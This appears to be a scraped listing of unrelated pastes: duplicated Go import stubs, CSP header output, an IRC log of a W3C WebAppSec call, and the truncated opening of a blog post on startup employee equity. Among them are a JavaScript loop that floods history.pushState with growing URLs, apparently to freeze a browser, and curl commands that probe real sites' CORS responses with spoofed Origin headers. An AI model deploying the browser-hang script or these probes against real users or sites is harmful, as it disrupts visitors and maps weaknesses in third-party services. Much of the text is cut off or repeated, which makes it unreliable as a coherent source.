ejcx

package main

import (
        "log"
        "net/http"
        "os"

        "github.com/gorilla/sessions"
)

ejcx

package main

import (
        "log"
        "net/http"
        "os"

        "github.com/gorilla/sessions"
)

ejcx

var total = "";
for( var i = 0; i < 100000; i++ ) {
    total = total + i.toString();
    history.pushState(0,0, total );
}

ejcx

root@ejjio:/var/www/breaking-sop# curl https://api.stripe.com -I
HTTP/1.1 401 Unauthorized
Server: nginx
Date: Tue, 23 Feb 2016 06:23:25 GMT
Content-Type: application/json
Content-Length: 342
Connection: keep-alive
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, HEAD, OPTIONS, DELETE
Access-Control-Allow-Origin: *

ejcx

root@ejjio:/var/www/breaking-sop# curl abcnews.go.com -H "Origin: http://abcnews.go.com.ej.cx" -I
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=edge,chrome=1
Content-Type: text/html;charset=utf-8
X-VG-WebCache: 164
Cache-Control: max-age=60
Content-Length: 151796
Accept-Ranges: bytes
Date: Tue, 23 Feb 2016 06:34:49 GMT

ejcx

~ vagrant :) curl ruben.verborgh.org -I -H "Origin: http://ej.cx"
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Tue, 23 Feb 2016 23:04:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14887
Last-Modified: Tue, 16 Feb 2016 13:23:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 24 Feb 2016 00:04:16 GMT

ejcx

root@ejjio:/var/www/breaking-sop# curl ej.cx -sI | grep Report-Only
Content-Security-Policy-Report-Only: default-src cf://*; report-uri https://ejj.io/report-uri
Content-Security-Policy-Report-Only : default-src df://*; report-uri https://test.io/report-uri

ejcx

package main

import (
	"crypto/rand"
	"fmt"
	"log"
	"net/http"
)

func main() {

ejcx

15:59 < mkwst> present+ mkwst
15:59  * mkwst might need to do that again if Zakim doesn't actually recognize the call?
15:59 < bhill2_> present+ bhill2
15:59 < bhill2_> Meeting: WebAppSec Teleconference, 23-Mar-2016
16:00 < bhill2_> Agenda: https://lists.w3.org/Archives/Public/public-webappsec/2016Mar/0073.html
16:00 < bhill2_> Chairs: bhill2, dveditz
16:00 < freddyb> present+ freddyb
16:00 -!- bhill2 [~bhill2@public.cloak] has quit [Ping timeout: 180 seconds]
16:00 -!- gmaone [~chatzilla@public.cloak] has joined #webappsec
16:01 -!- teddink [~teddink@public.cloak] has joined #webappsec

ejcx

Who pays when startup employees keep their equity?

JD Maturen, 2016/07/05, San Francisco, CA

As has been much discussed, stock options as used today are not a practical or reliable way of compensating employees of fast growing startups. With an often high strike price, a large tax burden on execution due to AMT, and a 90 day execution window after leaving the company many share options are left unexecuted.

There have been a variety of proposed modifications to how equity is distributed to address these issues for individual employees. However, there hasn't been much discussion of how these modifications will change overall ownership dynamics of startups. In this post we'll dive into the situation as it stands today where there is very near 100% equity loss when employees leave companies pre-exit and then we'll look at what would happen if there were instead a 0% loss rate.

What we'll see is that employees gain nearly 3-fold, while both founders and investors – particularly early investors – get dilute